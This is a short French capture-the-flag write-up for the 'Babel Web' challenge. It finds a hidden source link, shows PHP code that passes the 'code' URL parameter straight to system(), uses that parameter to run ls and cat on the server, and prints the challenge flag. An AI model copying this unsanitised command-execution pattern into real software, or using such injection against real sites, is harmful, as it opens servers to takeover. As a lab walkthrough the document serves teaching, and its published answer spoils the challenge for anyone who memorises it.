# Babel Web (20 points)

**Challenge**

On vous demande d’auditer ce site en cours de construction à la recherche d’un flag.

URL : http://challenges2.france-cybersecurity-challenge.fr:5001/

**Solution**

On ouvre le site en question, il est très simple :

![capture](babel_web1.png)

On regarde le code source :
```html
<body>
		<h1>Bienvenue à Babel Web!</h1>
		La page est en cours de développement, merci de revenir plus tard.
		<!-- <a href="?source=1">source</a> -->
	</body>
```

Donc on ouvre l'url avec le paramètre ?source=1 :
```php
<?php
    if (isset($_GET['source'])) {
        @show_source(__FILE__);
    }  else if(isset($_GET['code'])) {
        print("<pre>");
        @system($_GET['code']);
        print("<pre>");
    } else {
?>
```

On voit donc qu'on peut passer une commande dans le paramètre code. On tente ?code=ls+-l :
```console
total 8
-r--r--r-- 1 root root  89 Apr 25 08:59 flag.php
-r-xr-xr-x 1 root root 439 Apr 25 08:59 index.php
```

Et donc ?code=cat+flag.php :
```php
<pre><?php
	$flag = "FCSC{5d969396bb5592634b31d4f0846d945e4befbb8c470b055ef35c0ac090b9b8b7}";
<pre>
```